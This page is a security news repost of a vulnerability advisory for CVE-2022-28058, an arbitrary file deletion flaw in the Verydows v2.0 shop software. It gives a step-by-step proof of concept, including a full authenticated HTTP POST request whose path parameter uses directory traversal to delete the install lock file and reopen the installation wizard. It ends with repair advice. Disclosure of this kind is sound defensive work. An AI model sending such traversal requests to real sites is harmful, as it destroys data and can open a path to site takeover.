Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-28058: Arbitrary file deletion vulnerability exists · Issue #20 · Verytops/verydows

Verydows v2.0 was discovered to contain an arbitrary file deletion vulnerability via \backend\file_controller.php.

CVE
#vulnerability#windows#git#php

Vulnerability file: \protected\controller\backend\file_controller.php
It can be seen that the deleted file or directory is received through the path parameter, and is directly deleted without security filtering, so we can use this vulnerability to delete any file
image

Vulnerability to reproduce:

  1. First log in to the background to get cookies。
  2. Here I delete the installed.lock file to verify the existence of the vulnerability,construct the packet as follows:

POST /index.php?m=backend&c=file&a=delete HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.xiaodi.com/index.php?m=backend&c=file&a=index
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

path[]=…/install/installed.lock

3、Click Send Packet,you can see that the file was deleted successfully
image

4、It can be seen that when the installed.lock file exists, when visiting http://x.x.x/install, the page will directly jump to the front home page
image

Therefore, when we delete the installed.lock file and visit http://x.x.x/install again, we will come to the installation wizard page
image

Repair suggestion:

  1. Filter …/ or …\ in the file variable
  2. Limit the scope of deleted files or directories

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907